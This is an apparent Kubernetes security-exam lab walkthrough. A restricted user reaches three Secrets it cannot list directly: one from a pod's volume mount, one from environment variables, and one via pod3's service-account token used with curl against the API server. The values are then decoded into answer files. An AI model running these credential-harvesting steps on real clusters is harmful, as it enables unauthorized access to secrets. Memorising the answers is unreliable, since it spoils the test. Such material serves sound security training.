Solve this question on: ssh cks3477
You're asked to investigate a possible permission escape using the pre-defined context. The context authenticates as user restricted which has only limited permissions and shouldn't be able to read Secret values.
Tasks:
k config use-context restricted@infra-prod
k config use-context kubernetes-admin@kubernetes
First, let's switch to the restricted context and check our permissions:
➜ ssh cks3477
➜ candidate@cks3477:~# k config use-context restricted@infra-prod
Switched to context "restricted@infra-prod".
➜ candidate@cks3477:~# k -n restricted get role,rolebinding,clusterrole,clusterrolebinding
Error from server (Forbidden): roles.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "roles" in API group "rbac.authorization.k8s.io" in the namespace "restricted"
Error from server (Forbidden): rolebindings.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "rolebindings" in API group "rbac.authorization.k8s.io" in the namespace "restricted"
Error from server (Forbidden): clusterroles.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "clusterroles" in API group "rbac.authorization.k8s.io" at the cluster scope
Error from server (Forbidden): clusterrolebindings.rbac.authorization.k8s.io is forbidden: User "restricted" cannot list resource "clusterrolebindings" in API group "rbac.authorization.k8s.io" at the cluster scopeLet's try to access secrets directly:
➜ candidate@cks3477:~# k -n restricted get secret
Error from server (Forbidden): secrets is forbidden: User "restricted" cannot list resource "secrets" in API group "" in the namespace "restricted"Let's check what resources we can access:
➜ candidate@cks3477:~# k -n restricted get all
NAME READY STATUS RESTARTS AGE
pod1-fd5d64b9c-pcx6q 1/1 Running 0 37s
pod2-6494f7699b-4hks5 1/1 Running 0 37s
pod3-748b48594-24s76 1/1 Running 0 37sLet's check the pods for secret mounts:
➜ candidate@cks3477:~# k -n restricted get pod -o yaml | grep -i secretWe can access the first secret through pod1:
➜ candidate@cks3477:~# k -n restricted exec pod1-fd5d64b9c-pcx6q -- cat /etc/secret-volume/password
you-are
➜ candidate@cks3477:~# echo you-are > /opt/course/12/secret1Let's check the environment variables of pod2:
➜ candidate@cks3477:~# k -n restricted exec pod2-6494f7699b-4hks5 -- env | grep PASS
PASSWORD=an-amazing
➜ candidate@cks3477:~# echo an-amazing > /opt/course/12/secret2Let's check if we can create pods:
➜ candidate@cks3477:~# k -n restricted run test --image=nginx
Error from server (Forbidden): pods is forbidden: User "restricted" cannot create resource "pods" in API group "" in the namespace "restricted"Let's check if pod3 has a service account token mounted:
➜ candidate@cks3477:~# k -n restricted exec -it pod3-748b48594-24s76 -- sh
➜ / # mount | grep serviceaccount
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
➜ / # ls /run/secrets/kubernetes.io/serviceaccount
ca.crt namespace tokenWe can use the service account token to access the API server:
➜ / # curl https://kubernetes.default/api/v1/namespaces/restricted/secrets -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" -k
...
{
"metadata": {
"name": "secret3",
"namespace": "restricted",
...
}
]
},
"data": {
"password": "cEVuRXRSYVRpT24tdEVzVGVSCg=="
},
"type": "Opaque"
}
...Let's decode the secret value:
➜ candidate@cks3477:~# echo cEVuRXRSYVRpT24tdEVzVGVSCg== | base64 -d
pEnEtRaTiOn-tEsTeR
➜ candidate@cks3477:~# echo cEVuRXRSYVRpT24tdEVzVGVSCg== | base64 -d > /opt/course/12/secret3Finally, let's switch back to the original context:
➜ candidate@cks3477:~$ k config use-context kubernetes-admin@kubernetes
Switched to context "kubernetes-admin@kubernetes".